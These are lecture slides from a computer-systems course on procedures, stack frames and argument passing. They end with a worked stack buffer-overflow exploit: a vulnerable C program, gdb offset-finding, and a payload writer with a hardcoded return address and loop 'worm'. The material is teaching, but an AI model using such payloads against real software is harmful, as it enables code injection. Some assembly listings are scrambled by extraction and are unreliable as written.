CPSC 213 Introduction to Computer Systems
Unit 1e
Procedures and the Stack
Readings for Next 3 Lectures
‣ Textbook
• Procedures – 3.7
• Out-of-Bounds Memory References and Buffer Overflow – 3.12
Local Variables of a Procedure
public class A {
public static void b () {
void b () {
int l0 = 0;
int l1 = 1;
}
void foo () {
b ();
}
int l0 = 0;
int l1 = 1;
}
public class Foo {
static void foo () {
A.b (); }
}
}
Java
‣ Can l0 and l1 be allocated statically (i.e., by the compiler)? • [A] Yes
• [B] Yes, but only by eliminating recursion
• [C] Yes, but more than just recursion must be eliminated
• [D] No, no change to the language can make this possible
C
Dynamic Allocation of Locals
void b () {
int l0 = 0;
int l1 = 1;
}
void foo () {
b ();
}
‣ Lifetime of a local
• starts when procedure is called and ends when procedure returns • allocation and deallocation are implicitly part of procedure call
‣ Should we allocate locals from the heap?
• the heap is where Java new and C malloc, the other kind of dynamic storage • could we use the heap for locals?
– [A] Yes
– [B] Yes, but it would be less efficient to do so – [C] No
Procedure Storage Needs
‣ frame
• local variables
• saved registers – return address
frame
pointer
local 0
local 1
local 2
• arguments
‣ access through offsets from top
• just like arrays with base
ret addr
arg 0
arg 1
‣ simple example
• two local vars
• saved return address
0x1000 pointer
0x1000 0x1004
0x1008
arg 2
local 0
local 1
ret addr
local variables
saved registers
arguments
local variables
saved register
Stack vs. Heap
address
memory
‣ split memory into two pieces 0x00000000 • heap grows down
Frame C
Frame B
Frame A
Struct A
Struct B
Struct C
• stack grows up
‣ move stack pointer up to smaller number when add frame
‣ within frame, offsets go down
sp 0x4fea sp 0x4ff0 sp 0x4ff6 sp 0x5000
Frame
address 0xffffffff
stack
heap
pointer
ptr + 0 ptr + 4
ptr + 8
local 0 A
local 1
ret addr
Runtime Stack and Activation Frames
‣ Runtime Stack
• like the heap, but optimized for procedures
• one per thread
• grows “up” from lower addresses to higher ones
‣ Activation Frame
• an “object” that stores variables in procedure’s local scope
– local variables and formal arguments of the procedure
– temporary values such as saved registers (e.g., return address) and link to previous frame
• size and relative position of variables within frame is known statically
‣ Stack pointer
• register reserved to point to activation frame of current procedure • we will use r5
• accessing locals and args static offset from r5, the stack pointer (sp) – locals are accessed exactly like instance variables; r5 is pointer to containing “object”
Compiling a Procedure Call / Return
‣ Procedure Prologue
• code generated by compiler to execute just before procedure starts
• allocates activation frame and changes stack pointer – subtract frame size from the stack pointer r5
• possibly saves some register values ‣ Procedure Epilogue
• code generated by compiler to execute just before a procedure returns
• possibly restores some saved register values
• deallocates activation frame and restore stack pointer – add frame size to stack pointer r5
Snippet 8 – An example
foo: deca
st r6,(r5) #*sp=ra
1 allocate frame save r6
2 call b()
6 restore r6 deallocate frame
return
save r6 and allocate frame
body
5 deallocate frame return
r5 # sp-=4 for ra
gpc $6,r6 #r6=pc j b !!#gotob()
ld (r5), r6
inca r5
j (r6)
b: deca r5
st r6, (r5)
deca r5
deca r5
ld $0, r0
st r0, 0x0(r5) ld $0x1,r0
st r0, 0x4(r5)
inca r5
inca r5
ld (r5), r6
inca r5
j (r6)
#ra=*sp
# sp+=4 to discard ra # return
#sp-=4forra #*sp=ra #sp-=4forl1 #sp-=4forl0
#r0=0 # l0 = 0 #r0=1 # l1 = 1
#sp+=4todiscardl0 #sp+=4todiscardl1 #ra=*sp #sp+=4todiscardra # return
3
4
Creating the stack
‣ Every thread starts with a hidden procedure • its name is start (or sometimes something like crt0)
‣ The start procedure
• allocates memory for stack
• initializes the stack pointer
• calls main() (or whatever the thread’s first procedure is)
‣ For example in Snippet 8
• the “main” procedure is “foo”
• we’ll statically allocate stack at address 0x1000 to keep simulation simple
.pos 0x100
start: ld $0x1028, r5 # base of stack
gpc $6,r6 j foo halt
#r6=pc
# goto foo ()
.pos 0x1000
stack: .long 0x00000000
.long 0x00000000
…
Question
voidfoo(){ voidone(){ voidtwo(){ voidthree(){
// r5 = 2000
int i; two ();
int i; int j;
three ();
int i;
int j;
int k;
one (); }
}
}
‣ What is the value of r5 when executing in the procedure three() (in decimal)
•[A] •[B] •[C] • [D] • [E]
1964
2032
1968
None of the above I don’t know
}
Diagram of Stack for this Example
void three () {
int i;
Frame Three
local i
local j
local k
Frame Two
local i
local j
ret addr: $oneret
Frame One
local i
ret addr: $fooret
int j; int k;
sp 1968
ptr + 0 ptr + 4 ptr + 8
sp 1980
ptr + 0 ptr + 4 ptr + 8
sp 1992
void foo () { //r5=2000 ptr+4
one (); }
}
do not touch r6
save r6 to stack at (sp+8) then
set r6: $tworet
save r6 to stack at (sp+4) then
set r6: $oneret
void two () {
int i;
int j;
three (); }
void one () {
int i;
two (); }
ptr + 0
sp 2000
set r6: $fooret
Frame Foo
Arguments and Return Value
‣ return value
• in register, typically r0
‣ arguments
• in registers or on stack
Snippet 9
public class A {
static int add (int a, int b) {
int add (int a, int b) {
return a+b;
}
int s;
void foo () {
s = add (1,2);
}
return a+b; }
}
public class foo {
static int s;
static void foo () {
s = add (1,2);
}
C
}
Java
‣ Formal arguments
• act as local variables for called procedure • supplied values by caller
‣ Actual arguments
• values supplied by caller
• bound to formal arguments for call
Arguments in Registers (S9-args-regs.s)
.pos 0x200
foo: deca r5
st r6, (r5)
ld $0x1, r0
ld $0x2, r1
gpc $6, r6
j add
ld $s, r1
st r0, (r1)
ld 0x0(r5), r6
inca r5
j 0x0(r6)
# sp-=4
# save r6 to stack #arg0(r0)=1 #arg1(r1)=2 #r6=pc
# goto add () #r1=addressofs
# s = add (1,2)
# restore r6 from stack # sp+=4
# return
#return(r0)=a(r0)+b(r1) # return
.pos 0x300
add: add
r1,r0 j 0x0(r6)
Arguments on Stack (S9-args-stack.s)
.pos 0x200
foo: deca r5
st r6,(r5)
ld $0x2, r0
deca r5
st r0,(r5)
ld $0x1, r0
deca r5
st r0, (r5) gpc $6,r6 j add inca r5
inca r5
ld $s,r1 st r0, (r1) ld (r5), r6 inca r5
j (r6)
# sp-=4
# save r6 to stack
# r0 = 2
# sp-=4
# save arg1 on stack
# r0 = 1
# sp-=4
# save arg0 on stack #r6=pc
# goto add ()
# discard arg0 from stack # discard arg1 from stack #r1=addressofs
# s = add (1,2)
# restore r6 from stack
# sp+=4
# return
# r0 = arg0
# r1 = arg1 #return(r0)=a(r0)+b(r1) # return
.pos 0x300
add: ld
0x0(r5), r0
ld 0x4(r5), r1
add r1,r0 j 0x0(r6)
Args and Locals Summary
‣ stack is managed by code that the compiler generates
• grows from bottom up – push by subtracting
• procedure call
– allocates space on stack for arguments (unless using registers to pass args)
• procedure prologue
– allocates space on stack for local variables and saved registers (e.g., save r6)
• procedure epilogue
– deallocates stack frame (except arguments) and restores stack pointer and saved registers
• right after procedure call
– deallocates space on stack used for arguments – get return value (if any) from r0
‣ accessing local variables and arguments • static offset from stack pointer (e.g., r5)
Security Vulnerability in Buffer Overflow
‣ Find the bug in this program
void printPrefix (char* str) {
char buf[10];
char *bp = buf;
// copy str up to “.” input buf
while (*str!=’.’)
*(bp++) = *(str++);
*bp = 0;
}
// read string from standard input
void getInput (char* b) {
char* bc = b;
int n;
while ((n=fread(bc,1,1000,stdin))>0)
bc+=n; }
int main (int arc, char** argv) {
char input[1000];
puts (“Starting.”);
getInput (input);
printPrefix (input);
puts (“Done.”);
}
Possible array (buffer) overflow
How the Vulnerability is Created
‣ The “buffer” overflow bug
• if the position of the first ‘.’ in str is more than 10 bytes from the beginning
of str, this loop will write portions of str into memory beyond the end of buf
void printPrefix (char* str) {
char buf[10];
…
// copy str up to “.” input buf
while (*str!=’.’)
*(bp++) = *(str++);
*bp = 0;
‣ Giving an attacker control
• the size and value of str are inputs to this program
getInput (input);
printPrefix (input);
• if an attacker can provide the input, she can cause the bug to occur and can determine what values are written into memory beyond the end of buf
‣ the ugly
• buf is located on the stack
• so the attacker now as the ability to write to portion of the stack below buf • the return address is stored on the stack below buf
void printPrefix (char* str) {
char buf[10];
char *bp = buf;
// copy str up to “.” input buf
while (*str!=’.’)
*(bp++) = *(str++);
*bp = 0;
}
‣ why is this so ugly
• the attacker can change printPrefix’s return address • what power does this give the attacker?
The Stack when printPrefix is running
buf [0 ..9]
other stuff
return address
Mounting the Attack
‣ Goal of the attack
• exploit input-based buffer overflow bug
• to inject code into program (the virus/worm) and cause this code to execute • the worm then loads additional code onto compromised machine
‣ The approach
• attack a standard program for which the attacker has the code • scan the code looking for bugs that contain this vulnerability
• reverse-engineer the bug to determine what input triggers it
• create an attack and send it
‣ The attack input string has three parts
• a portion that writes memory up to the return address • a new value of the return address
• the worm code itself that is stored at this address
– if it is difficult to guess this address exactly, use a NOP sled to get to it (more in a moment)
Finding Location of Return Address
‣ use debugger with long test string to see return address when it crashes • bigstring: “0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ.”
• gdb buggy
– (gdb) run < bigstring
- Program received signal EXC_BAD_ACCESS, Could not access memory.
- Reason: KERN_INVALID_ADDRESS at address: 0x48474645
• man ascii
- 00nul 01soh 02stx 03etx 04eot 05enq 06ack 07bel
- 08bs 09ht 0anl 0bvt 0cnp 0dcr 0eso 0fsi
- 10dle 11dc1 12dc2 13dc3 14dc4 15nak 16syn 17etb
- 18can 19em 1asub 1besc 1cfs 1dgs 1ers 1fus
- 20sp 21! 22" 23# 24$ 25% 26& 27'
- 28( 29) 2a* 2b+ 2c, 2d- 2e. 2f/
- 300 311 322 333 344 355 366 377
- 388 399 3a: 3b; 3c< 3d= 3e> 3f?
– 40@ 41A 42B 43C 44D 45E 46F 47G
– 48H 49I 4aJ 4bK 4cL 4dM 4eN 4fO
– 50P 51Q 52R 53S 54T 55U 56V 57W
– 58X 59Y 5aZ 5b[ 5c\ 5d] 5e^ 5f_
– 60` 61a 62b 63c 64d 65e 66f 67g
– 68h 69i 6aj 6bk 6cl 6dm 6en 6fo
– 70p 71q 72r 73s 74t 75u 76v 77w
– 78x 79y 7az 7b{ 7c| 7d} 7e~ 7fdel
• return address used was HGFE (little endian), at buf[14] through buf[17]
Finding Location for Worm Code
‣ And so the attacking string looks like this
• bytes 0-13: • bytes 14-17: • bytes 18*:
anything but ‘.’ so that we get the overflow the address of buf[18]
the worm
‣ Determine the address of buf[18]
• (gdb) x/20bx buf – 0xbffff12e: 0x30
– 0xbffff136: 0x38
– 0xbffff13e: 0x47
• address is 0xbfff140
0x36 0x37 0x45 0x46
0x31 0x32
0x39 0x41
0x48 0x49 0x4a
0x33 0x34 0x35 0x42 0x43 0x44
Approximate Locations
‣ sometimes experiments only give rough not exact location
• use NOP sled for code block
– long list of NOP instructions used as preamble to the worm code
– jumping to any of these causes some nops to execute (which do nothing) and then the worm
– so, the return address can be any address from the start to the end of the sled • write many copies of return address
– if you don’t know exact spot where it’s expected – then only need to figure out alignment
Write Worm: Part 1
‣ write in C, compile it, disassemble it
void worm () {
while (1);
}
void write_worm () {
% gcc -o worm-writer-loop worm-writer-loop.c
(gdb) disassemble worm
Dump of assembler code for function worm:
0x00001eb2
0x00001eb3
0x00001eb5
0x00001eb8
(gdb) disassemble write_worm
Dump of assembler code for function write_worm: 0x00001eba
(gdb) x/2bx worm+6
0x1eb8
%ebp
%esp,%ebp
$0x8,%esp
0x1eb8
Write Worm: Part 2
void write_worm () {
char c[1000] = {
// 0-13: fill
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20,
// addr_buf=0xbffff140:
// new return address
0x40, 0xf1, 0xff, 0xbf,
// the worm
0xeb, 0xfe,
// to terminate the copy in printPrefix
‘.’ };
int fd,x;
fd = open (“worm”,O_CREAT|O_WRONLY|O_TRUNC,0x755);
x = write (fd, c, 21);
printf(“w %d\n”,x);
close (fd); }
‣ part 3: send the worm around the world (please don’t)
void printPrefix (char* str) { char buf[10];
…
// copy str into buf
}
int main (int arc, char** argv) {
…
printPrefix (input); puts (“Done.”);
}
‣ when printPrefix runs on malicious input
buf[0] buf[0] … … buf[9] buf[9] epb0 epb0
ebp1 ebp1
ebp2 ebp2
ebp3 ebp3
ra0 ra0
ra1 ra1
ra2 ra2
ra3 ra3
worm0 worm1 …
Demo
‣ % gcc -g -O2 -fno-stack-protector -Xlinker -allow_stack_execute -o buggy buggy.c ‣ % gdb buggy
• (gdb) run < smallstring
- Starting program: ./buggy < smallstring - Starting.
- Done.
- Program exited with code 012.
• (gdb) run < worm
- Starting program: ./buggy < worm - Starting.
‣ modern systems have some protections
• see Sec 3.12.1 in textbook: Thwarting Buffer Overflow Attacks
* The worm is loaded onto stack * The return address points to it * When printPrefix returns it
jumps to the worm
Comparing IA32 to SM213
• SM213 does not use a base pointer and so there is no saved ebp • SM213 saves/restores return address to/from stack before return
void printPrefix (char* str) { char buf[10];
...
// copy str into buf
}
int main (int arc, char** argv) {
...
printPrefix (input); puts ("Done.");
}
void start () {
main (); }
deca r5
buf[0] buf[0] ... ... buf[9] buf[9] ra0 ra0 ra1 ra1 ra2 ra2 ra3 ra3
st
...
ld
inca r5
j 0x0(r6)
# sp-=4
# save r6 to stack
In the Lab
r6, 0x0(r5)
0x0(r5), r6
put worm address in r6
#
# sp+=4
#jump to worm
‣ You play two roles
• first as innocent writer of a buggy program
• then as a malicious attacker seeking to exploit this program
‣ Attacker goal
• to get the program to execute code provided by attacker
‣ Rules of the attack (as they are with a real attack)
• you can NOT modify the target program code
• you can NOT directly modify the stack or any program data except input • you can ONLY provide an input to the program
• store your input in memory, ignoring how it will get there for real attack
- the program will have a single INPUT data area, you can modify this and only this ‣ Attacker input must include code
• use simulator to convert assembly to machine code • enter machine code as data in your input string
worm0 worm1 ...
Variables: a Summary
‣ global variables
• address know statically
‣ reference variables
• variable stores address of value (usually allocated dynamically)
‣ arrays
• elements, named by index (e.g. a[i])
• address of element is base + index * size of element
- base and index can be static or dynamic; size of element is static ‣ instance variables
• offset to variable from start of object/struct know statically • address usually dynamic
‣ locals and arguments
• offset to variable from start of activation frame know statically • address of stack frame is dynamic